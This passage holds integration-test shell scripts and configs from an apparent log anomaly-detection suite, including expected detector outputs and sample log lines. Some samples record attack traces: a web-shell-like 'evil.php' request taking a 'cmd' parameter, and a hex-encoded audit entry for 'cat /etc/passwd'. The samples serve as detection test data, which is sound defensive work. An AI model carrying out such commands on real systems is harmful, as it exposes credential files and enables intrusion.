home directory shown by pwd of the user ", "/model/HomePath/Username": "root", "/model/HomePath/Is": " is: ", "/model/HomePath/Path": "/root" } } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 2, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "NewValueCombo", "Message": "New value combination(s) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/HomePath/Username", "/model/HomePath/Path" ], "AffectedLogAtomValues": [ "root", "/root" ] }, "LogData": { "RawLogData": [ "The Path of the home directory shown by pwd of the user root is: /root" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/HomePath": "The Path of the home directory shown by pwd of the user root is: /root", "/model/HomePath/Pwd": "The Path of the home directory shown by pwd of the user ", "/model/HomePath/Username": "root", "/model/HomePath/Is": " is: ", "/model/HomePath/Path": "/root" } } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 2, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "NewValueCombo", "Message": "New value combination(s) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/HomePath/Username", "/model/HomePath/Path" ], "AffectedLogAtomValues": [ "user", "/home/user" ] }, "LogData": { "RawLogData": [ "The Path of the home directory shown by pwd of the user user is: /home/user" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/HomePath": "The Path of the home directory shown by pwd of the user user is: /home/user", "/model/HomePath/Pwd": "The Path of the home directory shown by pwd of the user ", 
"/model/HomePath/Username": "user", "/model/HomePath/Is": " is: ", "/model/HomePath/Path": "/home/user" } } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 2, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "NewValueCombo", "Message": "New value combination(s) detected", "PersistenceFileName": "Default", "TrainingMode": true, "AffectedLogAtomPaths": [ "/model/HomePath/Username", "/model/HomePath/Path" ], "AffectedLogAtomValues": [ "guest", "/home/guest" ] }, "LogData": { "RawLogData": [ "The Path of the home directory shown by pwd of the user guest is: /home/guest" ], "Timestamps": [ END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END ], "DetectionTimestamp": END JSON_OUTPUT+=("$VAR") read -r -d '' VAR << END , "LogLinesCount": 1, "AnnotatedMatchElement": { "/model/HomePath": "The Path of the home directory shown by pwd of the user guest is: /home/guest", "/model/HomePath/Pwd": "The Path of the home directory shown by pwd of the user ", "/model/HomePath/Username": "guest", "/model/HomePath/Is": " is: ", "/model/HomePath/Path": "/home/guest" } } } END JSON_OUTPUT+=("$VAR") # These strings are used in the isExpectedOutput()-function to identify the next array to be compared with. NEW_PATH_HD_REPAIR="new_path_hd_repair" UNPARSED_ATOM_HD_REPAIR="unparsed_atom_hd_repair" UNPARSED_ATOM_DATE_TIME="unparsed_atom_date_time" UNPARSED_ATOM_UNAME="unparsed_atom_uname" NEW_PATH_HOME_PATH_ROOT="new_path_home_path_root" NEW_VALUE_COMBINATION_HOME_PATH_ROOT="new_value_combination_home_path_root" NEW_VALUE_COMBINATION_HOME_PATH_USER="new_value_combination_home_path_user" NEW_VALUE_COMBINATION_HOME_PATH_GUEST="new_value_combination_home_path_guest" COUNTER=0 # This function checks if the input value starts with a date of the format YYYY-mm-dd HH:MM:SS. 
# $1 = String parameter to check function isDate() { if [[ $# -gt 0 && "$1" =~ [0-9]{4}\-[0-9]{2}\-[0-9]{2}\ [0-9]{2}:[0-9]{2}:[0-9]{2}* ]]; then return 0 fi return 1 } # This function checks if the input value contains the local UName. # $1 = String parameter to check function isUname() { if [[ $# -gt 0 && "$1" == *" `cat /etc/hostname`"* ]]; then return 0 fi return 1 } # This function checks if the input value contains name of the currently logged in user. # $1 = String parameter to check function isUser() { if [[ $# -gt 0 && "$1" == *" ` id -u -n`:"* ]]; then return 0 fi return 1 } # This function checks if the input value starts with a date followed by the local UName and the name of the currently logged in user. # The return values vary depending at which point the error occurs. # $1 = String parameter to check function startswithPredefinedMarkers() { if [ $# -eq 0 ]; then return 1 fi isDate "$1" if [ $? != 0 ]; then return 2 fi isUname "$1" if [ $? != 0 ]; then return 3 fi isUser "$1" if [ $? != 0 ]; then return 4 fi return 0 } # This function reads the output of the aminer, which is saved at /tmp/output, until an empty line occurs. # Every time a paragraph was read, the global variable $COUNTER is set to the iteration variable $i. # On the next call of this function all lines until $i equals $COUNTER are skipped. 
# $1 = String identifier for the expected values # $2 = Prefix position function isExpectedOutput() { before=$COUNTER i=0 temp=0 #ADD HERE if [[ $# -gt 0 && $1 == $NEW_PATH_HD_REPAIR ]]; then EXPECTED=("${NEW_PATH_HD_REPAIR_1[@]}") elif [[ $# -gt 0 && $1 == $UNPARSED_ATOM_HD_REPAIR ]]; then EXPECTED=("${UNPARSED_ATOM_1[@]}") elif [[ $# -gt 0 && $1 == $UNPARSED_ATOM_DATE_TIME ]]; then EXPECTED=("${UNPARSED_ATOM_2[@]}") elif [[ $# -gt 0 && $1 == $UNPARSED_ATOM_UNAME ]]; then EXPECTED=("${UNPARSED_ATOM_2[@]}") elif [[ $# -gt 0 && $1 == $NEW_PATH_HOME_PATH_ROOT ]]; then EXPECTED=("${NEW_PATH_HOME_PATH_ROOT_1[@]}") elif [[ $# -gt 0 && $1 == $NEW_VALUE_COMBINATION_HOME_PATH_ROOT ]]; then EXPECTED=("${NEW_VALUE_COMBINATION_HOME_PATH_ROOT_1[@]}") elif [[ $# -gt 0 && $1 == $NEW_VALUE_COMBINATION_HOME_PATH_USER ]]; then EXPECTED=("${NEW_VALUE_COMBINATION_HOME_PATH_USER_1[@]}") elif [[ $# -gt 0 && $1 == $NEW_VALUE_COMBINATION_HOME_PATH_GUEST ]]; then EXPECTED=("${NEW_VALUE_COMBINATION_HOME_PATH_GUEST_1[@]}") else echo "No valid expected value found!" return 1 fi input="/tmp/output" while IFS= read -r line do #echo "i $i" # Skip already processed lines. if [ $i -lt $COUNTER ]; then i=$((i + 1)) continue # Paragraphs always terminate with an empty line. This line also must be skipped. elif [[ $i -eq $COUNTER && $line == "" ]]; then i=$((i + 1)) temp=1 continue fi #echo "$line" # Every paragraph must start with an date of the format YYYY-mm-dd HH:MM:SS. if [ `expr $i - $COUNTER - $temp` -eq 0 ]; then isDate "$line" ret=$? if [[ $? != 0 ]]; then echo "isDate() return value: $ret" return 2 fi fi # When the prefix position is reached, the predefined markers are checked (date -> uname -> user). # To avoid this check, just use an negative or too high value for the prefix position. if [ `expr $i - $before - $temp` -eq $2 ]; then startswithPredefinedMarkers "$line" ret=$? #echo startswith $? 
if [[ $ret != 0 ]]; then echo "Startswith() return value: $ret" return 2 fi fi # At the end of an paragraph stop reading the file and go to return from the function. if [ "$line" == "" ]; then break # When the current line contains the expected value at the expected position, # read until the following values do not match or the EXPECTED array ends. elif [[ "$line" == *"${EXPECTED[$i - $before - $temp]}"* ]]; then i=$((i + 1)) while [[ "$line" == *"${EXPECTED[$i - $before - $temp]}"* && "${EXPECTED[$i - $before - $temp]}" != "" ]] do i=$((i + 1)) done # An error occured, when the line does not match or is not empty. else echo "line: $line" echo "expected: ${EXPECTED[$i - $before - $temp]}" return 2 fi done < "$input" COUNTER=$i # Check if all elements of the EXPECTED array were processed. if [ `expr $i - $before - $temp` == "${#EXPECTED[@]}" ]; then return 0 fi return 3 } # This function checks if the output of the StreamPrinterEventHandler is as expected. # The order of the events is fixed and must be expanded every time a new log line is added to the integration test. function checkAllOutputs() { res=0 isExpectedOutput $UNPARSED_ATOM_HD_REPAIR 2 ret=$? if [ $ret == 0 ]; then echo "Unparsed Atom found as expected." else echo "Expected Unparsed Atom was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $NEW_PATH_HD_REPAIR -1 ret=$? if [ $ret == 0 ]; then echo "NewMatchPath found as expected." else echo "Expected NewMatchPath was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $UNPARSED_ATOM_HD_REPAIR 2 ret=$? if [ $ret == 0 ]; then echo "Unparsed Atom found as expected." else echo "Expected Unparsed Atom was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $UNPARSED_ATOM_UNAME -1 ret=$? if [ $ret == 0 ]; then echo "Unparsed Atom found as expected." else echo "Expected Unparsed Atom was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $NEW_PATH_HOME_PATH_ROOT -1 ret=$? 
if [ $ret == 0 ]; then echo "NewMatchPath found as expected." else echo "Expected NewMatchPath was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $NEW_VALUE_COMBINATION_HOME_PATH_ROOT -1 ret=$? if [ $ret == 0 ]; then echo "NewValueCombination found as expected." else echo "Expected NewValueCombination was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $NEW_VALUE_COMBINATION_HOME_PATH_USER -1 ret=$? if [ $ret == 0 ]; then echo "NewValueCombination found as expected." else echo "Expected NewValueCombination was not found! Return value: $ret" res=1 echo "" fi isExpectedOutput $NEW_VALUE_COMBINATION_HOME_PATH_GUEST -1 ret=$? if [ $ret == 0 ]; then echo "NewValueCombination found as expected." else echo "Expected NewValueCombination was not found! Return value: $ret" res=1 echo "" fi #ADD HERE return $res } # This function checks if the output of the DefaultMailNotificationEventHandler is as expected. # The $linecount variable is the fixed count of log lines and must be changed every time a new log line is added. # At each loop run one mail is read into /tmp/out from which further checks are made. function checkAllMails() { res=0 linecount=10 dpkg -s mailutils &> /dev/null if [ ! $? -eq 0 ]; then echo -e "\e[31mMailutils-package is not installed! Installing it now..]" sudo apt install mailutils -y fi echo "" echo "waiting for mails to arrive.." echo "" i=1 while [ $i -lt $linecount ] do sudo echo p | mail > /tmp/out input="/tmp/out" t=false aminerMail=false while IFS= read -r searched do # Between all mail headers and the content and after the content of the mail always is an empty line. # The paragraph found in the content must also be found in the previously created /tmp/output file. if [ "$searched" == "" ]; then if [ $t == false ]; then t=true else break fi fi # If the first empty line was found and the subject equals "aminer Alerts:" the following paragraph # must be found in the previously created /tmp/output file. 
if [[ $t == true && $aminerMail == true ]]; then expected="/tmp/output" found=false while IFS= read -r line do if [[ "$line" == "$searched" ]]; then found=true break fi done < "$expected" # Set the aminerMail boolean to True, when the expected subject was found elif [[ "$searched" == *"Subject: aminer Alerts:"* ]]; then #echo "Subject found!" aminerMail=true # Stop searching, when the subject is not the expected aminer subject. elif [[ "$searched" != *"Subject: aminer Alerts:"* && "$searched" == *"Subject:"* ]]; then echo "wrong mail" i=$(($i-1)) break fi # If the time is lesser than the start time of the integration test, an old mail is found. if [[ "$searched" == *"Date: "* ]]; then d="${searched:6}" dat=`date -d "$d" +%s` if [[ $dat -lt $time ]]; then echo "old mail" i=$(($i-1)) break fi fi # An error occured, when a line was not found in the /tmp/output file. if [[ $t == true && $aminerMail == true && $found == false ]]; then echo "$searched" echo "$line" echo "not found!" res=1 fi done < "$input" i=$(($i+1)) done echo "finished waiting.." return $res } # This function checks if the output of the Syslog is as expected. function checkAllSyslogs(){ sudo tail -n 1000 /var/log/syslog > /tmp/out lastLine=`tail -n 1 /tmp/output` if [[ $lastLine == "" ]]; then sudo sed -i "$ d" /tmp/output fi cntr=0 input="/tmp/out" i=0 j=0 while IFS= read -r searched do # every syslog starts with a 15 characters long datetime. d="${searched:0:15}" dat=`date -d "$d" +%s` # Ignore all old syslogs and just process the current ones. if [[ !($dat -lt $time) ]]; then expected="/tmp/output" found=false g=0 while IFS= read -r line do if [ $g == $cntr ]; then # Increase the counters, when a paragraph finished. if [ "$line" == "" ]; then j=0 i=$(($i+1)) cntr=$(($cntr + 1)) g=$(($g+1)) continue fi # The first line of a paragraph always starts with the count of paragraphs logged. 
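if [[ ($j == 0 && "$searched" == *": [$i] $line"*) ]]; then
  found=true
  cntr=$(($cntr + 1))
  break
# All other lines also contain a counter for the lines in the paragraph
elif [[ "$searched" == *": [$i-$j] $line"* ]]; then
  found=true
  cntr=$(($cntr + 1))
  break
fi
fi
g=$(($g+1))
done < "$expected"
if [ $found == true ]; then
  j=$(($j+1))
fi
fi
done < "$input"
echo "finished waiting.."
# $NUMBER_OF_LOG_LINES must always be the number of paragraphs in /tmp/output minus one,
# as there is no empty line before the first paragraph.
if [ $i == $NUMBER_OF_LOG_LINES ]; then
  return 0
fi
return 1
}

# This function checks if the output of the Kafka Topic is as expected.
# It consumes test_topic from the local broker (waiting at most 3 s) and
# verifies that every entry of JSON_OUTPUT occurs in the consumed text, in
# array order: after each hit the consumed text is cut up to and including
# that entry, so later entries can only match later output.
# Returns 0 when all entries were found; on the first miss it prints the
# entry searched for and the not yet examined output, then returns 1.
function checkKafkaTopic(){
  out=$($KAFKA_VERSIONSTRING/bin/kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic test_topic --from-beginning --timeout-ms 3000)
  for t in "${JSON_OUTPUT[@]}"
  do
    if [[ $out != *"$t"* ]]; then
      echo "searched: $t"
      echo
      echo "remaining output: $out"
      return 1
    fi
    # cut the output string to remove timestamps and datetimes.
    # "$t" is quoted so that glob characters inside the expected JSON
    # ('[', '*', '?') are matched literally, exactly as in the containment
    # test above; unquoted they would be interpreted as a pattern.
    out=${out#*"$t"}
  done
  return 0
}
logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/offline_mode/000077500000000000000000000000001437606560100257565ustar00rootroot00000000000000
logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/offline_mode/data/000077500000000000000000000000001437606560100266675ustar00rootroot00000000000000
logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/offline_mode/data/file1.log000066400000000000000000000000141437606560100303650ustar00rootroot00000000000000
a1 b1 c1 z1
logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/offline_mode/data/file2.log000066400000000000000000000000141437606560100303660ustar00rootroot00000000000000
a2 b2 c2 z2
logdata-anomaly-miner-2.6.1/aecid-testsuite/integration/offline_mode/offline_mode.yml000066400000000000000000000010021437606560100311200ustar00rootroot00000000000000
LearnMode: False
Core.LogDir: '/tmp/lib/aminer/log'
Core.PersistenceDir: '/tmp/lib/aminer'
LogResourceList:
  - 'file:///tmp/file1.log'
  - 'file:///tmp/file2.log'
Parser:
  - id: data
    type: AnyByteDataModelElement
    name: 'data'
  - id: model
    start: True
    type: FirstMatchModelElement
    name: 'model'
    args:
      - data
Input:
  timestamp_paths: None
EventHandlers:
  - id: stpe
    type: StreamPrinterEventHandler
logdata-anomaly-miner-2.6.1/aecid-testsuite/runAminerDemo.sh000077500000000000000000000013221437606560100241070ustar00rootroot00000000000000
# Runs the aminer demo (demo/aminer/aminerDemo.sh) with the configuration
# file given as $1 (.py or .yml), staged under the fixed name the demo reads,
# and fails when the demo's stderr shows a crash or a configuration error.
# Exit status: 2 for an unsupported config file type; 1 when stderr contains
# "Traceback", "{'Parser'", "FATAL" or "Config-Error"; else the demo's status.
# NOTE(review): the config is staged under a fixed name in world-writable
# /tmp, chown'ed to aminer and then run via sudo; that is only acceptable on
# a dedicated test host, as another local user could pre-create that path.
ERR=/tmp/err.txt
if [[ $1 == *.py ]]; then
  cp "$1" /tmp/demo-config.py
  sudo chown aminer:aminer /tmp/demo-config.py 2> /dev/null
elif [[ $1 == *.yml ]]; then
  cp "$1" /tmp/demo-config.yml
  sudo chown aminer:aminer /tmp/demo-config.yml 2> /dev/null
else
  exit 2
fi
sudo chown -R aminer:aminer /tmp/lib 2> /dev/null
sudo chmod +x demo/aminer/aminerDemo.sh
sudo ./demo/aminer/aminerDemo.sh > /dev/null 2> $ERR
exit_code=$?
# Call grep directly (as runAminerEncodingDemo.sh does) instead of wrapping
# it in backticks: the backtick form ran grep's empty output as the command
# and only yielded grep's status because bash treats an empty command that
# way. -F matches the markers literally.
if grep -Fq "Traceback" $ERR || grep -Fq "{'Parser'" $ERR || grep -Fq "FATAL" $ERR || grep -Fq "Config-Error" $ERR; then
  exit_code=1
fi
cat $ERR
sudo rm /tmp/demo-config.py 2> /dev/null
sudo rm /tmp/demo-config.yml 2> /dev/null
sudo rm /tmp/syslog
sudo rm $ERR
exit $exit_code
logdata-anomaly-miner-2.6.1/aecid-testsuite/runAminerEncodingDemo.sh000077500000000000000000000013751437606560100255640ustar00rootroot00000000000000
# Same as runAminerDemo.sh, but appends a Log.Encoding = latin-1 setting to
# the staged copy of the config given as $1 before running the demo, to
# exercise non-UTF-8 input handling.
# Exit status: 2 for an unsupported config file type; 1 when the demo's
# stderr contains "Traceback"; else the demo's status.
# NOTE(review): same fixed-name staging in /tmp as runAminerDemo.sh applies.
ERR=/tmp/err.txt
if [[ $1 == *.py ]]; then
  cp "$1" /tmp/demo-config.py
  echo "config_properties['Log.Encoding'] = 'latin-1'" >> /tmp/demo-config.py
  sudo chown aminer:aminer /tmp/demo-config.py 2> /dev/null
elif [[ $1 == *.yml ]]; then
  cp "$1" /tmp/demo-config.yml
  echo "Log.Encoding: 'latin-1'" >> /tmp/demo-config.yml
  sudo chown aminer:aminer /tmp/demo-config.yml 2> /dev/null
else
  exit 2
fi
sudo chown -R aminer:aminer /tmp/lib 2> /dev/null
sudo chmod +x demo/aminer/aminerDemo.sh
sudo ./demo/aminer/aminerDemo.sh > /dev/null 2> $ERR
exit_code=$?
# The previous OUTPUT=$(cat $ERR) was never read; stderr is printed via cat below.
if grep -Fq "Traceback" $ERR; then
  exit_code=1
fi
cat $ERR
sudo rm /tmp/demo-config.py 2> /dev/null
sudo rm /tmp/demo-config.yml 2> /dev/null
sudo rm $ERR
exit $exit_code
logdata-anomaly-miner-2.6.1/aecid-testsuite/runAminerIntegrationTest.sh000077500000000000000000000010371437606560100263510ustar00rootroot00000000000000
# Runs one integration test script from ./integration as root.
# $1 is the script name; every further argument names a file that is copied
# to /tmp under the same name before the run and removed again afterwards.
# Exits with the script's status after cleaning up.
# NOTE(review): the first line overwrites /etc/hostname on the test host and
# the extra arguments are used unchecked as /tmp/<name> paths; both are fine
# only on a throw-away test machine invoked with trusted arguments.
echo localhost | sudo tee /etc/hostname > /dev/null
cd integration
script=$1
sudo chmod +x "$script"
cntr=0
# Skip $1 (the script itself); stage the remaining arguments in /tmp.
for var in "$@"
do
  if [[ $cntr -gt 0 ]]; then
    cp "$var" /tmp/"$var"
  fi
  cntr=$(($cntr+1))
done
sudo ./"$script"
exit_code=$?
cntr=0
for var in "$@"
do
  if [[ $cntr -gt 0 ]]; then
    sudo rm /tmp/"$var"
  fi
  cntr=$(($cntr+1))
done
test -e /var/mail/mail && sudo rm -f /var/mail/mail
cd ..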
# Tear-down of the integration run: /tmp/syslog and /tmp/output are removed
# unconditionally, /tmp/out and /tmp/auth.log only when present.
sudo rm /tmp/syslog
sudo rm /tmp/output
test -e /tmp/out && sudo rm /tmp/out
test -e /tmp/auth.log && sudo rm /tmp/auth.log
exit $exit_code
logdata-anomaly-miner-2.6.1/aecid-testsuite/runAminerJsonInputDemo.sh000077500000000000000000000052451437606560100257670ustar00rootroot00000000000000
# Runs the JSON input demo (demo/aminerJsonInputDemo/aminerJsonInputDemo.sh)
# as root with its config staged in /tmp, captures its stdout in /tmp/out.txt
# and checks that four detector reports appear verbatim in that output.
# Exit status: the demo's own status, or 1 when any expected report is missing.
# NOTE(review): this copy of the file lost its original line breaks; the
# breaks inside the expected-output heredocs below were reconstructed from
# the report layout, and any leading whitespace the real output carries in
# front of those lines could not be recovered - confirm against the
# repository version before relying on these checks.
cp demo/aminerJsonInputDemo/json-input-demo-config.yml /tmp/json-input-demo-config.yml
sudo chown -R aminer:aminer /tmp/lib 2> /dev/null
sudo chmod +x demo/aminerJsonInputDemo/aminerJsonInputDemo.sh
sudo ./demo/aminerJsonInputDemo/aminerJsonInputDemo.sh > /tmp/out.txt
exit_code=$?
OUTPUT=$(cat /tmp/out.txt)
# read -d '' slurps the whole heredoc into VAR (it returns non-zero at EOF,
# which is expected and ignored here).
read -r -d '' VAR << END
New path(es) detected
NewMatchPathDetector: "DefaultNewMatchPathDetector" (1 lines)
/model: {'menu': {'id': 'file', 'value': 'File', 'popup': {'menuitem': [{'value': 'New', 'onclick': 'CreateNewDoc()'}, {'value': 'Open', 'onclick': 'OpenDoc()'}, {'value': 'Close', 'onclick': 'CloseDoc()'}]}}}
/model/menu/id: file
/model/menu/value: File
/model/menu/popup/menuitem/buttonNames: 0
/model/menu/popup/menuitem/buttonOnclick: 0
/model/menu/popup/menuitem/buttonNames: 1
/model/menu/popup/menuitem/buttonOnclick: 1
/model/menu/popup/menuitem/buttonNames: 2
/model/menu/popup/menuitem/buttonOnclick: 2
['/model', '/model/menu/popup/menuitem/buttonNames', '/model/menu/popup/menuitem/buttonOnclick', '/model/menu/id', '/model/menu/value', '/model/menu/popup/menuitem/buttonNames/0', '/model/menu/popup/menuitem/buttonOnclick/0', '/model/menu/popup/menuitem/buttonNames/1', '/model/menu/popup/menuitem/buttonOnclick/1', '/model/menu/popup/menuitem/buttonNames/2', '/model/menu/popup/menuitem/buttonOnclick/2']
Original log line: {"menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } }}
END
# Substring test of the expected block against the whole demo output; on a
# miss the expected block is printed so the failure is visible in the log.
if [[ "$OUTPUT" != *"$VAR"* ]]; then
  echo "$VAR"
  echo
  exit_code=1
fi
read -r -d '' VAR << END
New value combination(s) detected
NewMatchPathValueComboDetector: "NewMatchPathValueCombo" (1 lines)
(b'file', b'File')
Original log line: {"menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } }}
END
if [[ "$OUTPUT" != *"$VAR"* ]]; then
  echo "$VAR"
  echo
  exit_code=1
fi
read -r -d '' VAR << END
New value(s) detected
NewMatchPathValueDetector: "NewMatchPathValue" (1 lines)
{'/model/menu/id': 'file'}
END
if [[ "$OUTPUT" != *"$VAR"* ]]; then
  echo "$VAR"
  echo
  exit_code=1
fi
read -r -d '' VAR << END
New value(s) detected
NewMatchPathValueDetector: "NewMatchPathValue" (1 lines)
{'/model/menu/value': 'File'}
END
if [[ "$OUTPUT" != *"$VAR"* ]]; then
  echo "$VAR"
  echo
  exit_code=1
fi
# Cleanup of the staged config and the files written during the run.
sudo rm /tmp/json-input-demo-config.yml 2> /dev/null
sudo rm /tmp/syslog
sudo rm /tmp/out.txt
exit $exit_code
logdata-anomaly-miner-2.6.1/aecid-testsuite/runConfAvailableTest.sh000077500000000000000000002164221437606560100254260ustar00rootroot00000000000000
#!/bin/bash .
./testFunctions.sh sudo mkdir /tmp/lib 2> /dev/null sudo mkdir /tmp/lib/aminer 2> /dev/null sudo chown -R $USER:$USER /tmp/lib/aminer 2> /dev/null sudo rm -r /tmp/lib/aminer/* 2> /dev/null sudo mkdir /tmp/lib/aminer/log 2> /dev/null sudo chown -R aminer:aminer /tmp/lib/aminer 2> /dev/null sudo rm /tmp/syslog 2> /dev/null exit_code=0 CONFIG_PATH=/tmp/config.yml OUT=/tmp/output.txt LOGFILE=/tmp/log.txt #PATH_AIT_LDS=../source/root/etc/aminer/conf-available/ait-lds/*.py PATH_AIT_LDS=/etc/aminer/conf-available/ait-lds/*.py #PATH_AIT_LDS2=../source/root/etc/aminer/conf-available/ait-lds2/*.py PATH_AIT_LDS2=/etc/aminer/conf-available/ait-lds2/*.py #PATH_GENERIC=../source/root/etc/aminer/conf-available/generic/*.py PATH_GENERIC=/etc/aminer/conf-available/generic/*.py cntr=0 files=() for filename in $PATH_AIT_LDS; do files[$cntr]=$filename let cntr=cntr+1 done for filename in $PATH_AIT_LDS2; do files[$cntr]=$filename let cntr=cntr+1 done for filename in $PATH_GENERIC; do files[$cntr]=$filename let cntr=cntr+1 done for filename in ${files[@]}; do cat > $CONFIG_PATH < $LOGFILE echo '::1 - - [17/May/2015:10:05:03 +0000] "-" 200 203023' >> $LOGFILE echo '192.168.10.190 - - [29/Feb/2020:13:58:32 +0000] "GET /services/portal/ HTTP/1.1" 200 7499 "-" "-"' >> $LOGFILE ;; ApacheErrorParsingModel) echo '[Sun Mar 01 06:28:15.983231 2020] [:error] [pid 32548] [client 192.168.10.4:55308] PHP Warning: Declaration of Horde_Form_Type_pgp::init($gpg, $temp_dir = NULL, $rows = NULL, $cols = NULL) should be compatible with Horde_Form_Type_longtext::init($rows = 8, $cols = 80, $helper = Array) in /usr/share/php/Horde/Form/Type.php on line 878, referer: http://mail.cup.com/nag/' > $LOGFILE echo "[Sun Mar 01 06:28:15.983231 2020] [:error] [pid 32548] [client 192.168.10.4:55308] PHP Warning: system(): Cannot execute a blank command in words.php on line 12" > $LOGFILE echo "[Wed Mar 04 19:32:45.144442 2020] [:error] [pid 8738] [client 192.168.10.238:60488] PHP Notice: Undefined index: cmd in 
/var/www/mail.cup.com/static/evil.php on line 1" >> $LOGFILE echo "[Wed Mar 04 06:26:43.756548 2020] [:error] [pid 22069] [client 192.168.10.190:33604] PHP Deprecated: Methods with the same name as their class will not be constructors in a future version of PHP; Horde_Form_Variable has a deprecated constructor in /usr/share/php/Horde/Form/Variable.php on line 24, referer: http://mail.cup.com/nag/" >> $LOGFILE ;; AuditdParsingModel) echo 'type=EXECVE msg=audit(1582934957.620:917519): argc=10 a0="find" a1="/usr/lib/php" a2="-mindepth" a3="1" a4="-maxdepth" a5="1" a6="-regex" a7=".*[0-9]\.[0-9]" a8="-printf" a9="%f\n"' > $LOGFILE echo 'type=PROCTITLE msg=audit(1582934957.616:917512): proctitle=736F7274002D726E' >> $LOGFILE echo 'type=SYSCALL msg=audit(1582934957.616:917513): arch=c000003e syscall=2 success=yes exit=3 a0=7f5b904e4988 a1=80000 a2=1 a3=7f5b906ec518 items=1 ppid=25680 pid=25684 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sort" exe="/usr/bin/sort" key=(null)' >> $LOGFILE echo 'type=PATH msg=audit(1582934957.616:917512): item=0 name="/usr/bin/sort" inode=2883 dev=fe:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL' >> $LOGFILE echo 'type=LOGIN msg=audit(1582935421.373:947570): pid=25821 uid=0 old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=22 res=1' >> $LOGFILE echo "type=SOCKADDR msg=audit(1582935421.377:947594): saddr=01002F6465762F6C6F6700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000" >> $LOGFILE echo "type=UNKNOWN[1327] msg=audit(1522927552.749:917): proctitle=636174002F6574632F706173737764" >> $LOGFILE echo 'type=CRED_REFR msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_START 
msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_ACCT msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_AUTH msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=CRED_DISP msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=SERVICE_START msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=SERVICE_STOP msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_END msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=USER_CMD msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=CRED_ACQ msg=audit(1583242318.512:13886958): pid=17474 uid=33 auid=4294967295 ses=4294967295 msg=message comm="apache2" terminal="/usr/bin/bash" res=(null)' >> $LOGFILE echo 'type=BPRM_FCAPS msg=audit(1583242318.512:13886958): fver=17474 fp=33 fi=4294967295 fe=4294967295 old_pp=message old_pi="apache2" old_pe="/usr/bin/bash" new_pp=(null) new_pi=(null) new_pe=(null)' >> $LOGFILE ;; EximParsingModel) echo "2020-02-29 00:04:25 Start queue run: pid=31912" > $LOGFILE echo "2020-02-29 00:34:25 End queue run: pid=32425" >> $LOGFILE echo "2020-03-04 
